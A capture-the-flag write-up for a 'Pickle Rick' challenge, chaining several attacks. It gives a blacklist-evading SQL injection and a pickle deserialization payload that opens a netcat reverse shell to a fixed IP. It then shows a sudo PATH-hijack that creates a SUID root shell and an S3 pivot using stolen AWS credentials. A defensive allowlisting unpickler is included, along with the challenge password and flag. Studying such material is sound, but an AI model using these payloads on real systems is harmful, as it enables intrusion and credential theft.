# Pickle Rick

| Difficulty | Points | Solves |
| ---------- | ------ | ------ |
| Hard       | X      | X      |

## Description

Rick has turned himself into a pickle. Can you find him before it's too late...

File is temporarily hosted at <https://drive.google.com/file/d/1ZULGK4p7cJQHNabmDHdtki-g1xNfHu0f>

MD5: ba83987433851f2101f846e89b9b99f6\
SHA256: 1dd4388022be3946a72dd3fcf2603896396a8574d5dbe214f9ecf1b0a8b2db92\
Password: `&y9PBYf8gZ^996s9`

I suggest giving participants the link to download the file before the CTF starts, and only releasing the password once the CTF has started.

## Solution

1. SQL injection, bypassing the keyword blacklist with mixed-case keywords:

```
"oR"2"LiKE"2
```

2. Python insecure deserialization with the `pickle` module for RCE

Sample payload:

```py
import pickle
import os

class RCE:
    # pickle records the return value of __reduce__ when serialising; on load,
    # the unpickler calls os.system(cmd), so deserialising this object spawns
    # a reverse shell to the listener below
    def __reduce__(self):
        cmd = 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.174.136 4444 >/tmp/f'
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())

    # write the serialised object to disk for upload to the target
    with open("pickled_data.pickle", "wb") as f:
        f.write(pickled)
```
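A defender-side counterpart to the payload above, added here as an example and not part of the original writeup: it statically lists the globals a pickle would import (via `pickletools`, without loading it) and loads untrusted data through a `find_class` allowlist, so a `__reduce__` that points at `os.system` is refused before it can run. The `Shell` class and the sample bytes are constructed for the demo; allowlisting is defence in depth, the primary fix is to not unpickle user-supplied data at all.

```python
import builtins
import io
import os
import pickle
import pickletools

# Only these builtins may be resolved from untrusted data; os.system,
# subprocess.Popen and friends are refused before the unpickler can call them.
SAFE_BUILTINS = {"dict", "list", "set", "frozenset", "tuple", "str", "bytes", "int", "float", "bool"}

# Opcodes that push a string; STACK_GLOBAL consumes the last two of them.
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "UNICODE", "STRING", "SHORT_BINSTRING", "BINSTRING"}


def referenced_globals(data):
    """Statically list every module.name a pickle would import, without loading it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":           # protocol <= 3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":   # protocol 4+: module and name were pushed as strings
            found.append((strings[-2], strings[-1]))
        elif op.name in STRING_OPS:
            strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def load_untrusted(data):
    """Return (True, obj) for an allowed pickle, (False, reason) otherwise."""
    try:
        return True, RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)


# Constructed samples: a harmless shop object, and a payload shaped like the
# writeup's RCE class (same __reduce__ trick, but with an inert command).
class Shell:
    def __reduce__(self):
        return os.system, ("true",)

BENIGN = pickle.dumps({"user": "rick", "cart": [1, 2, 3]})
MALICIOUS = pickle.dumps(Shell())
```

On Linux `referenced_globals(MALICIOUS)` reports `('posix', 'system')`, since that is the module `os.system` really lives in; the allowlist rejects it either way.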

3. Binary with the SUID bit in the `/opt` directory: `/opt/clean_pickle.sh`

Running `sudo -l` shows the user can run `/opt/clean_pickle.sh` with sudo under the `SETENV` and `NOPASSWD` tags, so `PATH` can be overridden for that invocation and the script picks up a planted binary instead of the real one.

Exploit script:

```sh
# fake "rm" that the script finds first on the hijacked PATH
echo "cp /bin/sh /tmp/qaz; chmod +s /tmp/qaz" > /tmp/rm
chmod +x /tmp/rm
# SETENV allows pushing /tmp to the front of PATH for the sudo'd script
sudo PATH=/tmp:$PATH /opt/clean_pickle.sh

# run the SUID copy of sh; -p keeps the effective uid (root)
/tmp/qaz -p
```

4. Pivoting to AWS Cloud

`/root/.aws/credentials` contains clear-text IAM credentials for AWS. Enumerate the permissions and list the S3 objects.

```
[default]

aws_access_key_id = redacted
aws_secret_access_key = redacted
```

5. Get flag :D

```sh
aws configure
AWS Access Key ID [****************E5EW]: redacted
AWS Secret Access Key [****************O+wn]: redacted
Default region name [None]: 
Default output format [None]: 

aws s3 ls
2023-02-13 16:12:01 lnc-pickle-shop

aws s3 ls lnc-pickle-shop
2023-02-13 16:12:56         26 flag.txt

aws s3 cp s3://lnc-pickle-shop/flag.txt flag.txt
download: s3://lnc-pickle-shop/flag.txt to ./flag.txt

cat flag.txt
```

## Flag

`LNC2023{1m_p1ckl3_r1111ck}`
